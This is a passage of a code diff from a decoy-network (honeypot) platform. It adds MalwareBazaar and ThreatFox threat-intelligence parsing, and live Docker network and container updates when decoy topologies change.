+            return False
+        try:
+            await self._ensure_fresh()
+        except Exception as exc:  # noqa: BLE001
+            # Belt and braces: _ensure_fresh swallows refresh failures
+            # but a bug in there shouldn't blow up the ingester payload.
+            log.exception("malwarebazaar refresh raised: %s", exc)
+            return False
+        return sha256.lower() in self._known
+
+
+def _parse_dump(body: bytes) -> set[str]:
+    """Extract SHA-256 hashes from MalwareBazaar's full dump.
+
+    The endpoint returns a ZIP archive containing a single CSV with a
+    ``sha256_hash`` column. Some abuse.ch flavours of the same feed
+    family ship plain CSV instead — handle both by sniffing the magic
+    bytes. Hashes are lowercased; non-hex / wrong-length values are
+    dropped (defense in depth — we set-membership-test by exact match).
+    """
+    if body[:2] == b"PK":
+        with zipfile.ZipFile(io.BytesIO(body)) as zf:
+            csv_names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
+            if not csv_names:
+                raise ValueError("zip has no .csv member")
+            with zf.open(csv_names[0]) as fh:
+                csv_bytes = fh.read()
+    else:
+        csv_bytes = body
+    text = csv_bytes.decode("utf-8", errors="replace")
+    return _extract_hashes(text)
+
+
+def _extract_hashes(text: str) -> set[str]:
+    """Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
+
+    The dump prefaces the table with ``#``-prefixed comment lines.
+    Skip those, find the header row, locate the column, then read the
+    rest. csv.reader handles the quoting (the ``signature`` column
+    contains commas and is properly quoted in the dump).
+    """
+    body_lines = [
+        line for line in text.splitlines()
+        if line and not line.lstrip().startswith("#")
+    ]
+    if not body_lines:
+        return set()
+    reader = csv.reader(body_lines)
+    header = next(reader, None)
+    if not header:
+        return set()
+    norm = [h.strip().strip('"').lower() for h in header]
+    try:
+        col = norm.index("sha256_hash")
+    except ValueError:
+        # Fallback — first column is sha256 in every documented
+        # variant; if the header naming changes upstream we still
+        # capture something rather than silently emptying the set.
+        col = 0
+    out: set[str] = set()
+    for row in reader:
+        if len(row) <= col:
+            continue
+        cell = row[col].strip().strip('"').lower()
+        if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
+            out.add(cell)
+    return out
--- a/decnet/intel/threatfox.py
+++ b/decnet/intel/threatfox.py
@@ -12,7 +12,6 @@ caps requests/min — the provider works either way.
 """
 from __future__ import annotations

-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,10 @@ class ThreatFoxProvider(IntelProvider):
                verdict=None,  # absence is not a benign signal
                column_updates={
                    "threatfox_listed": False,
-                    "threatfox_raw": "{}",
+                    "threatfox_threat_types": [],
+                    "threatfox_ioc_types": [],
+                    "threatfox_malware_families": [],
+                    "threatfox_raw": {},
                    "threatfox_queried_at": datetime.now(timezone.utc),
                },
            )
@@ -83,12 +85,37 @@ class ThreatFoxProvider(IntelProvider):

        data = payload.get("data") or []
        listed = bool(data)
+        # Each match in ``data`` carries threat_type / ioc_type / malware
+        # (canonical family). The IntelLifter dispatches ATT&CK techniques
+        # off ``threat_type`` (botnet_cc / payload_delivery / payload /
+        # cc_skimming); the other two columns are evidence and SIEM
+        # context. Sets are flattened across matches and serialised
+        # sorted for determinism.
+        threat_types: set[str] = set()
+        ioc_types: set[str] = set()
+        families: set[str] = set()
+        if isinstance(data, list):
+            for entry in data:
+                if not isinstance(entry, dict):
+                    continue
+                tt = entry.get("threat_type")
+                if isinstance(tt, str) and tt:
+                    threat_types.add(tt)
+                it = entry.get("ioc_type")
+                if isinstance(it, str) and it:
+                    ioc_types.add(it)
+                family = entry.get("malware") or entry.get("malware_printable")
+                if isinstance(family, str) and family:
+                    families.add(family)
        return IntelResult(
            provider=self.name,
            verdict="malicious" if listed else None,
            column_updates={
                "threatfox_listed": listed,
-                "threatfox_raw": json.dumps(data),
+                "threatfox_threat_types": sorted(threat_types),
+                "threatfox_ioc_types": sorted(ioc_types),
+                "threatfox_malware_families": sorted(families),
+                "threatfox_raw": data,
                "threatfox_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/worker.py
+++ b/decnet/intel/worker.py
@@ -59,6 +59,38 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
    return None


+def _build_intel_event_payload(
+    attacker_uuid: str,
+    ip: str,
+    row: dict[str, Any],
+    providers: list[IntelProvider],
+) -> dict[str, Any]:
+    """Project the AttackerIntel row into the bus event the TTP worker
+    consumes as ``source_kind="intel"``.
+    """
+    return {
+        "attacker_uuid": attacker_uuid,
+        "attacker_ip": ip,
+        "aggregate_verdict": row.get("aggregate_verdict"),
+        "providers": [p.name for p in providers],
+        # AbuseIPDB
+        "abuseipdb_score": row.get("abuseipdb_score"),
+        "abuseipdb_categories": row.get("abuseipdb_categories") or [],
+        # GreyNoise
+        "greynoise_classification": row.get("greynoise_classification"),
+        "greynoise_name": row.get("greynoise_name"),
+        "greynoise_tags": row.get("greynoise_tags") or [],
+        # Feodo
+        "feodo_listed": row.get("feodo_listed"),
+        "feodo_malware_family": row.get("feodo_malware_family"),
+        # ThreatFox
+        "threatfox_listed": row.get("threatfox_listed"),
+        "threatfox_threat_types": row.get("threatfox_threat_types") or [],
+        "threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
+        "threatfox_malware_families": row.get("threatfox_malware_families") or [],
+    }
+
+
 async def _enrich_one(
    attacker_uuid: str,
    ip: str,
@@ -172,12 +204,9 @@ async def run_intel_loop(
                        await publish_safely(
                            bus,
                            _topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
-                            {
-                                "attacker_uuid": attacker_uuid,
-                                "attacker_ip": ip,
-                                "aggregate_verdict": row.get("aggregate_verdict"),
-                                "providers": [p.name for p in providers],
-                            },
+                            _build_intel_event_payload(
+                                attacker_uuid, ip, row, providers,
+                            ),
                            event_type=_topics.ATTACKER_INTEL_ENRICHED,
                        )
                    except Exception:  # noqa: BLE001
@@ -200,11 +229,11 @@ async def run_intel_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/logging/init.py
+++ b/decnet/logging/init.py
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
        self.component = component

    def filter(self, record: logging.LogRecord) -> bool:
-        record.decnet_component = self.component  # type: ignore[attr-defined]
+        record.decnet_component = self.component
        return True


@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
            span = trace.get_current_span()
            ctx = span.get_span_context()
            if ctx and ctx.trace_id:
-                record.otel_trace_id = format(ctx.trace_id, "032x")  # type: ignore[attr-defined]
-                record.otel_span_id = format(ctx.span_id, "016x")  # type: ignore[attr-defined]
+                record.otel_trace_id = format(ctx.trace_id, "032x")
+                record.otel_span_id = format(ctx.span_id, "016x")
            else:
-                record.otel_trace_id = "0"  # type: ignore[attr-defined]
-                record.otel_span_id = "0"  # type: ignore[attr-defined]
+                record.otel_trace_id = "0"
+                record.otel_span_id = "0"
        except Exception:
-            record.otel_trace_id = "0"  # type: ignore[attr-defined]
-            record.otel_span_id = "0"  # type: ignore[attr-defined]
+            record.otel_trace_id = "0"
+            record.otel_span_id = "0"
        return True


--- a/decnet/models.py
+++ b/decnet/models.py
@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
    services: list[str] = PydanticField(..., min_length=1)
    distro: str          # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
    base_image: str      # Docker image for the base/IP-holder container
-    build_base: str = "debian:bookworm-slim"  # apt-compatible image for service Dockerfiles
+    build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"  # apt-compatible image for service Dockerfiles; digest pinned via distros.py
    hostname: str
    archetype: str | None = None  # archetype slug if spawned from an archetype profile
    service_config: dict[str, dict] = PydanticField(default_factory=dict)
--- a/decnet/mutator/engine.py
+++ b/decnet/mutator/engine.py
@@ -101,7 +101,10 @@ async def mutate_decky(

    try:
        # Wrap blocking call in thread
-        await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
+        cp = compose_path
+        await anyio.to_thread.run_sync(
+            lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
+        )
    except Exception as e:
        log.error("mutation failed decky=%s error=%s", decky_name, e)
        console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
@@ -161,6 +164,8 @@ async def mutate_all(
        if force or only is not None:
            due = True
        else:
+            if interval_mins is None:
+                continue
            elapsed_secs = now - decky.last_mutated
            due = elapsed_secs >= (interval_mins * 60)
            remaining = (interval_mins * 60) - elapsed_secs
@@ -284,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
        return 0
    drained = 0
    for topo in pending:
-        tid = topo["id"]
+        tid = topo.id
        try:
            await _deployer.resync_agent_topology(repo, tid)
            await repo.set_topology_resync(tid, False)
            drained += 1
            log.info("topology %s resynced to agent %s",
-                     tid, topo.get("target_host_uuid"))
+                     tid, topo.target_host_uuid)
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "topology %s resync failed (will retry): %s", tid, exc,
@@ -405,11 +410,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
-            if t is None:
+        for task in (*wake_tasks, heartbeat_task):
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/mutator/ops.py
+++ b/decnet/mutator/ops.py
@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
    )


+async def _materialise_lan_change(
+    repo: Any,
+    topology_id: str,
+    *,
+    created: Optional[tuple[str, str, bool]] = None,
+    removed: Optional[str] = None,
+) -> None:
+    """Create or remove the docker bridge for a live LAN op + re-render compose.
+
+    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
+    write lands.  Skips when:
+
+    * the topology is not active/degraded (a pending topology gets its
+      networks created at deploy time),
+    * the topology is pinned to a swarm agent (cross-host materialisation
+      isn't implemented; the agent's apply_topology RPC re-renders the
+      whole compose at next push),
+    * the docker SDK / networking primitive raises (logged, not
+      re-raised — the DB row is the source of truth).
+    """
+    topology = await repo.get_topology(topology_id)
+    if topology is None:
+        return
+    status = topology.status
+    if status not in ("active", "degraded"):
+        return
+    if topology.target_host_uuid:
+        _log.info(
+            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
+            topology_id,
+        )
+        return
+
+    # Lazy imports — these pull in docker.py / network.py which both
+    # require the docker SDK; keeping them out of module-import keeps
+    # the mutator usable in test environments that stub docker.
+    import docker
+    from decnet.engine.deployer import _topology_compose_path
+    from decnet.network import create_bridge_network, remove_bridge_network
+    from decnet.topology.compose import _network_name, write_topology_compose
+
+    client = docker.from_env()
+    try:
+        if created is not None:
+            name, subnet, is_dmz = created
+            net_name = _network_name(topology_id, name)
+            try:
+                create_bridge_network(
+                    client, net_name, subnet, internal=not is_dmz,
+                )
+            except Exception as exc:  # noqa: BLE001
+                _log.error(
+                    "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
+                    topology_id, name, subnet, exc,
+                )
+                # Don't re-raise — the DB row is the source of truth.
+                # Operator can retry by removing + re-adding the LAN.
+        if removed is not None:
+            net_name = _network_name(topology_id, removed)
+            try:
+                remove_bridge_network(client, net_name)
+            except Exception as exc:  # noqa: BLE001
+                _log.warning(
+                    "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
+                    topology_id, removed, exc,
+                )
+
+        # Re-render compose so the file on disk matches the DB.  Even
+        # when the bridge create above failed, a future redeploy will
+        # try to bring the network back from the compose definition.
+        hydrated = await hydrate(repo, topology_id)
+        if hydrated is not None:
+            try:
+                write_topology_compose(
+                    hydrated, _topology_compose_path(topology_id),
+                )
+            except Exception as exc:  # noqa: BLE001
+                _log.warning(
+                    "live LAN op: compose re-render failed topology=%s: %s",
+                    topology_id, exc,
+                )
+    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
+        _log.error(
+            "live LAN materialisation crashed topology=%s: %s",
+            topology_id, exc,
+        )
+
+
+def _is_buildx_wedge(exc: BaseException) -> bool:
+    """True when *exc* looks like the buildx EROFS wedge.
+
+    We consult both the structured CalledProcessError.stderr and the
+    str(exc) form because ``_compose_with_retry`` raises a synthetic
+    CalledProcessError whose ``stderr`` contains the recovery hint
+    (which preserves the wedge signatures verbatim).
+    """
+    from decnet.engine.deployer import (
+        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
+    )
+    stderr = ""
+    if hasattr(exc, "stderr") and exc.stderr:
+        stderr = str(exc.stderr)
+    haystack = (stderr + " " + str(exc)).lower()
+    return (
+        _BUILDX_WEDGE_SIGNATURE in haystack
+        and _BUILDX_EROFS_SIGNATURE in haystack
+    )
+
+
+async def _compose_up_with_buildkit_fallback(
+    *args: str, compose_file, label: str,
+) -> None:
+    """Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
+
+    The buildx activity dir occasionally lands on a read-only mount —
+    happens enough on operator dev boxes that we don't want a single
+    wedge to abort a live decky-add.  When _compose_with_retry raises
+    with the EROFS-wedge signatures, we retry once with
+    ``DOCKER_BUILDKIT=0`` set.  The legacy (non-buildx) builder doesn't
+    use the activity dir and isn't affected.
+
+    *label* is a human-readable identifier used only in log lines so an
+    operator can grep the fall-back back to the originating op.
+    """
+    import anyio
+    from decnet.engine.deployer import _compose_with_retry
+    try:
+        await anyio.to_thread.run_sync(
+            lambda: _compose_with_retry(*args, compose_file=compose_file),
+        )
+        return
+    except Exception as exc:  # noqa: BLE001
+        if not _is_buildx_wedge(exc):
+            raise
+        _log.warning(
+            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
+            "(legacy builder).  Recover the buildx state at your leisure: "
+            "rm -rf ~/.docker/buildx/activity && "
+            "docker buildx create --name decnet-builder --use --bootstrap",
+            label,
+        )
+    # Outside the except so the second attempt's traceback isn't
+    # nested under the first failure if it also blows up.
+    await anyio.to_thread.run_sync(
+        lambda: _compose_with_retry(
+            *args, compose_file=compose_file,
+            env={"DOCKER_BUILDKIT": "0"},
+        ),
+    )
+
+
+def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
+    """Compose service names for one decky: base + each per-decky service.
+
+    Skips ``fleet_singleton`` services — those run once fleet-wide and
+    don't have a per-decky compose entry.  Mirrors the same filter
+    applied at compose-render time
+    (:mod:`decnet.topology.compose.generate_topology_compose`).
+    """
+    from decnet.services.registry import get_service
+    targets = [decky_name]
+    for svc_name in services:
+        try:
+            svc = get_service(svc_name)
+        except KeyError:
+            # Unknown service — leave it; the compose render won't emit
+            # a fragment for it, so compose up will simply ignore the
+            # name with a clear "no such service" error.  Surface that
+            # rather than silently dropping it.
+            targets.append(f"{decky_name}-{svc_name}")
+            continue
+        if svc.fleet_singleton:
+            continue
+        targets.append(f"{decky_name}-{svc_name}")
+    return targets
+
+
+async def _live_topology_or_none(
+    repo: Any, topology_id: str,
+) -> Optional[dict[str, Any]]:
+    """Return the topology row only when it's eligible for live materialisation.
+
+    Returns None (so callers can skip with a single ``if`` check) when:
+
+    * the topology doesn't exist;
+    * status is not ``active`` or ``degraded`` (pending topologies get
+      everything materialised at deploy time);
+    * the topology is pinned to a swarm agent (cross-host live editing
+      is its own routing workstream).
+    """
+    topology = await repo.get_topology(topology_id)
+    if topology is None:
+        return None
+    if topology.status not in ("active", "degraded"):
+        return None
+    if topology.target_host_uuid:
+        _log.info(
+            "live decky op skipped (agent-pinned topology=%s); "
+            "next agent push will reconcile",
+            topology_id,
+        )
+        return None
+    return topology
+
+
+async def _rerender_compose(repo: Any, topology_id: str) -> None:
+    """Re-render the per-topology compose file from the current DB.
+
+    Called after each materialisation step so the file on disk matches
+    the topology rows.  Soft-fails: a render error is logged but
+    doesn't poison the DB-side mutation.
+    """
+    from decnet.engine.deployer import _topology_compose_path
+    from decnet.topology.compose import write_topology_compose
+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:
+        return
+    try:
+        write_topology_compose(hydrated, _topology_compose_path(topology_id))
+    except Exception as exc:  # noqa: BLE001
+        _log.warning(
+            "live op: compose re-render failed topology=%s: %s",
+            topology_id, exc,
+        )
+
+
+async def _materialise_decky_spawn(
+    repo: Any, topology_id: str, decky_name: str, services: list[str],
+) -> bool:
+    """compose up -d --no-deps --build for one decky (base + services).
+
+    Re-renders compose first so the file lists the new decky.  Returns
+    True when compose-up reported success, False otherwise (or when
+    the topology isn't eligible for live materialisation — pending
+    topologies skip and return False so the caller doesn't flip the
+    state to ``running`` based on a no-op).  Best-effort: docker
+    failure is logged, not re-raised — DB row is the source of truth.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return False
+    from decnet.engine.deployer import _topology_compose_path
+    await _rerender_compose(repo, topology_id)
+    targets = _decky_targets(decky_name, services)
+    compose_path = _topology_compose_path(topology_id)
+    try:
+        await _compose_up_with_buildkit_fallback(
+            "up", "-d", "--no-deps", "--build", *targets,
+            compose_file=compose_path,
+            label=f"live add_decky topology={topology_id} decky={decky_name}",
+        )
+        return True
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live add_decky: compose up failed topology=%s decky=%s: %s",
+            topology_id, decky_name, exc,
+        )
+        return False
+
+
+async def _materialise_decky_remove(
+    repo: Any, topology_id: str, decky_name: str, services: list[str],
+) -> None:
+    """compose stop + rm -f for one decky's containers, then re-render."""
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import anyio
+    from decnet.engine.deployer import _compose, _topology_compose_path
+
+    targets = _decky_targets(decky_name, services)
+    compose_path = _topology_compose_path(topology_id)
+    # Stop + rm BEFORE re-rendering compose; the re-rendered file no
+    # longer mentions the decky, so a stop run AFTER rendering would
+    # find no service to act on.
+    try:
+        await anyio.to_thread.run_sync(
+            lambda: _compose("stop", *targets, compose_file=compose_path),
+        )
+    except Exception as exc:  # noqa: BLE001
+        _log.warning(
+            "live remove_decky: compose stop failed topology=%s decky=%s: %s",
+            topology_id, decky_name, exc,
+        )
+    try:
+        await anyio.to_thread.run_sync(
+            lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
+        )
+    except Exception as exc:  # noqa: BLE001
+        _log.warning(
+            "live remove_decky: compose rm failed topology=%s decky=%s: %s",
+            topology_id, decky_name, exc,
+        )
+    await _rerender_compose(repo, topology_id)
+
+
+async def _materialise_decky_connect(
+    repo: Any, topology_id: str,
+    decky_name: str, lan_name: str, ipv4_address: str,
+) -> None:
+    """SDK ``network.connect`` to multi-home a running base container.
+
+    Service containers share the base's netns via ``network_mode:
+    service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
+    the base alone gives every service container the new interface for
+    free — we don't need to iterate.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import docker
+    from decnet.topology.compose import _container_name, _network_name
+
+    net_name = _network_name(topology_id, lan_name)
+    container_name = _container_name(topology_id, decky_name)
+    try:
+        client = docker.from_env()
+        net = client.networks.get(net_name)
+        container = client.containers.get(container_name)
+        net.connect(container, ipv4_address=ipv4_address)
+    except docker.errors.APIError as exc:
+        # Idempotency — already on the network is fine.
+        msg = str(exc).lower()
+        if "already" in msg or "endpoint" in msg and "exists" in msg:
+            _log.info(
+                "live attach_decky: %s already on network %s — skipping",
+                container_name, net_name,
+            )
+        else:
+            _log.error(
+                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
+                topology_id, decky_name, lan_name, exc,
+            )
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
+            topology_id, decky_name, lan_name, exc,
+        )
+    await _rerender_compose(repo, topology_id)
+
+
+async def _materialise_decky_disconnect(
+    repo: Any, topology_id: str, decky_name: str, lan_name: str,
+) -> None:
+    """SDK ``network.disconnect`` to drop a multi-home edge."""
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import docker
+    from decnet.topology.compose import _container_name, _network_name
+
+    net_name = _network_name(topology_id, lan_name)
+    container_name = _container_name(topology_id, decky_name)
+    try:
+        client = docker.from_env()
+        net = client.networks.get(net_name)
+        container = client.containers.get(container_name)
+        net.disconnect(container)
+    except docker.errors.APIError as exc:
+        msg = str(exc).lower()
+        if "not connected" in msg or "no such" in msg:
+            _log.info(
+                "live detach_decky: %s already off network %s — skipping",
+                container_name, net_name,
+            )
+        else:
+            _log.error(
+                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
+                topology_id, decky_name, lan_name, exc,
+            )
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
+            topology_id, decky_name, lan_name, exc,
+        )
+    await _rerender_compose(repo, topology_id)
+
+
+async def _materialise_decky_services_diff(
+    repo: Any, topology_id: str,
+    decky_name: str,
+    added: list[str],
+    removed: list[str],
+) -> None:
+    """Add/remove per-service containers without touching siblings.
+
+    Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
+    without coupling the mutator to that module — service mutations
+    routed via the mutator queue publish ``mutation.applied`` while the
+    direct API publishes ``decky.<name>.service_added``; they share
+    machinery, not control flow.
+    """
+    if not added and not removed:
+        return
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import anyio
+    from decnet.engine.deployer import _compose, _topology_compose_path
+
+    await _rerender_compose(repo, topology_id)
+    compose_path = _topology_compose_path(topology_id)
+    add_targets = _decky_targets(decky_name, list(added))[1:]  # drop the base
+    if add_targets:
+        try:
+            await _compose_up_with_buildkit_fallback(
+                "up", "-d", "--no-deps", "--build", *add_targets,
+                compose_file=compose_path,
+                label=f"live update_decky add topology={topology_id} decky={decky_name}",
+            )
+        except Exception as exc:  # noqa: BLE001
+            _log.error(
+                "live update_decky add: compose up failed topology=%s decky=%s: %s",
+                topology_id, decky_name, exc,
+            )
+    rm_targets = _decky_targets(decky_name, list(removed))[1:]
+    for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
+        if not rm_targets:
+            break
+        try:
+            await anyio.to_thread.run_sync(
+                lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path),  # type: ignore[misc]
+            )
+        except Exception as exc:  # noqa: BLE001
+            _log.warning(
+                "live update_decky %s failed topology=%s decky=%s: %s",
+                action_name, topology_id, decky_name, exc,
+            )
+
+
+async def _materialise_decky_recreate_base(
+    repo: Any, topology_id: str, decky_name: str,
+) -> None:
+    """Force-recreate just the base container (used for forwards_l3 flips).
+
+    DESTRUCTIVE: kills any in-container state on the base.  Service
+    containers re-attach via ``network_mode: service:<base>`` after the
+    base is rebuilt.  Caller is responsible for gating this on an
+    explicit operator-supplied ``force=true`` flag.
+    """
+    if await _live_topology_or_none(repo, topology_id) is None:
+        return
+    import anyio
+    from decnet.engine.deployer import (
+        _compose_with_retry, _topology_compose_path,
+    )
+    await _rerender_compose(repo, topology_id)
+    compose_path = _topology_compose_path(topology_id)
+    try:
+        await anyio.to_thread.run_sync(
+            lambda: _compose_with_retry(
+                "up", "-d", "--no-deps", "--force-recreate", decky_name,
+                compose_file=compose_path,
+            ),
+        )
+    except Exception as exc:  # noqa: BLE001
+        _log.error(
+            "live update_decky recreate_base failed topology=%s decky=%s: %s",
+            topology_id, decky_name, exc,
+        )
+
+
 # ------------------------------------------------------------------- ops


@@ -131,6 +588,16 @@ async def apply_add_lan(
            "y": payload.get("y"),
        }
    )
+
+    # Live materialisation: when the topology is active/degraded, create
+    # the docker bridge network now and re-render the per-topology
+    # compose file so subsequent ``apply_add_decky`` writes a coherent
+    # services map.  Pending topologies skip this — the next deploy
+    # creates everything from scratch.  Agent-pinned topologies also
+    # skip; live editing on agents is its own routing problem.
+    await _materialise_lan_change(
+        repo, topology_id, created=(name, subnet, is_dmz),
+    )
    await _assert_valid_after(repo, topology_id)


@@ -150,7 +617,17 @@ async def apply_remove_lan(
                f"LAN {lan['name']!r} is the home LAN of decky "
                f"{d['decky_config']['name']!r}; remove the decky first"
            )
-    await repo.delete_lan(lan["id"])
+    lan_name = lan["name"]
+    # enforce_pending=False: the mutator queue is the live-editing
+    # surface, gated on topology status by us before we got here.  The
+    # repo's pending-only guard is for HTTP CRUD callers that mustn't
+    # bypass it.
+    await repo.delete_lan(lan["id"], enforce_pending=False)
+
+    # Live materialisation symmetric to apply_add_lan: tear down the
+    # docker bridge and re-render compose so a future redeploy doesn't
+    # try to wire deckies into a network that no longer exists.
+    await _materialise_lan_change(repo, topology_id, removed=lan_name)
    await _assert_valid_after(repo, topology_id)


@@ -204,11 +681,12 @@ async def apply_add_decky(
    if forwards_l3:
        decky_config["forwards_l3"] = True

+    services_list = list(payload.get("services", []))
    decky_uuid = await repo.add_topology_decky(
        {
            "topology_id": topology_id,
            "name": name,
-            "services": list(payload.get("services", [])),
+            "services": services_list,
            "decky_config": decky_config,
            "x": payload.get("x"),
            "y": payload.get("y"),
@@ -223,6 +701,25 @@ async def apply_add_decky(
            "forwards_l3": forwards_l3,
        }
    )
+    # Live materialisation: spawn the new decky's containers without
+    # touching siblings.  Skips on pending / agent-pinned topologies —
+    # see _live_topology_or_none.
+    spawned = await _materialise_decky_spawn(
+        repo, topology_id, name, services_list,
+    )
+    # Flip the row's state to 'running' on success so the dashboard's
+    # ACTIVE DECKIES count reflects reality.  Without this the row
+    # stays at the default 'pending' forever; the deployer's full
+    # post-deploy reconcile only runs on a fresh deploy_topology.
+    if spawned:
+        try:
+            await repo.update_topology_decky(decky_uuid, {"state": "running"})
+        except Exception as exc:  # noqa: BLE001
+            _log.warning(
+                "live add_decky: state flip to running failed "
+                "topology=%s decky=%s: %s",
+                topology_id, name, exc,
+            )
    await _assert_valid_after(repo, topology_id)


@@ -286,6 +783,16 @@ async def apply_attach_decky(
            "forwards_l3": forwards_l3,
        }
    )
+    # Live materialisation: SDK network.connect on the base container.
+    # Service containers share the base's netns via network_mode:
+    # service:<base>, so they inherit the new interface — only the base
+    # needs the connect.
+    await _materialise_decky_connect(
+        repo, topology_id,
+        decky_name=decky["decky_config"]["name"],
+        lan_name=lan["name"],
+        ipv4_address=ip,
+    )
    await _assert_valid_after(repo, topology_id)


@@ -329,7 +836,15 @@ async def apply_detach_decky(
    await repo.update_topology_decky(
        decky["uuid"], {"decky_config": new_cfg}
    )
-    await repo.delete_topology_edge(edge["id"])
+    await repo.delete_topology_edge(edge["id"], enforce_pending=False)
+    # Live materialisation: SDK network.disconnect on the base
+    # container.  Service containers automatically lose visibility into
+    # the LAN because they share the base's netns.
+    await _materialise_decky_disconnect(
+        repo, topology_id,
+        decky_name=decky["decky_config"]["name"],
+        lan_name=lan["name"],
+    )
    await _assert_valid_after(repo, topology_id)


@@ -340,7 +855,15 @@ async def apply_remove_decky(
    decky = _decky_by_name(hydrated, payload["decky"])
    if decky is None:
        raise MutationError(f"decky {payload['decky']!r} not found")
-    await repo.delete_topology_decky(decky["uuid"])
+    decky_name = decky["decky_config"]["name"]
+    services_list = list(decky.get("services") or [])
+    await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
+    # Live materialisation: stop + rm -f the decky's containers.  We
+    # capture decky_name + services BEFORE the delete so the helper
+    # has the targets even though the row is gone.
+    await _materialise_decky_remove(
+        repo, topology_id, decky_name, services_list,
+    )
    await _assert_valid_after(repo, topology_id)


@@ -354,31 +877,136 @@ async def apply_update_decky(
        ``patch``         — dict merged into existing ``decky_config``.
        ``services``      — replacement top-level services list.
        ``x``,``y``       — layout coords.
+        ``force``         — opt-in for destructive recreates (currently
+                            required when ``forwards_l3`` flips on a
+                            live topology — see below).
+
+    Live materialisation strategy:
+
+    * **services changed** → diff old vs new; ``compose up -d`` for
+      added, ``compose stop`` + ``rm -f`` for removed.  Mirrors the
+      direct API path (services_live) without coupling.
+    * **forwards_l3 flipped** → port publishing changes, which docker
+      can only apply at container-create time.  Requires recreating
+      the base — destructive (kills in-container state, drops active
+      sessions).  Gated on ``payload['force'] is True``; otherwise we
+      raise ``MutationError`` so a half-thinking operator doesn't
+      stomp a live decky.
+    * **only coords (x/y)** → DB-only.  No docker work.
    """
    hydrated = await _hydrated(repo, topology_id)
    decky = _decky_by_name(hydrated, payload["decky"])
    if decky is None:
        raise MutationError(f"decky {payload['decky']!r} not found")
+
+    # Capture pre-state so we can compute the diff after the DB write.
+    old_services = list(decky.get("services") or [])
+    old_cfg = decky.get("decky_config") or {}
+    old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
+
    patch: dict[str, Any] = {}
+    new_decky_config = old_cfg
    if payload.get("patch"):
-        merged = dict(decky["decky_config"])
-        merged.update(payload["patch"])
-        patch["decky_config"] = merged
+        new_decky_config = {**old_cfg, **payload["patch"]}
+        patch["decky_config"] = new_decky_config
+    new_services = old_services
    if "services" in payload:
-        patch["services"] = list(payload["services"])
+        new_services = list(payload["services"])
+        patch["services"] = new_services
    for key in ("x", "y"):
        if key in payload:
            patch[key] = payload[key]
    if not patch:
        return
+
+    new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
+    forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
+
+    # Promotion path: refuse to flip a non-DMZ decky to gateway.  The
+    # 'gateway' semantic specifically means 'host-port publisher facing
+    # the DMZ' — running it on an internal LAN publishes ports the
+    # outside world can't reach and shadows the host's port space.
+    # Generic L3-bridge forwards_l3 (internal multi-homing) is set by
+    # the generator/attach paths, not by this op, so this check only
+    # fires when the operator explicitly toggles the flag.
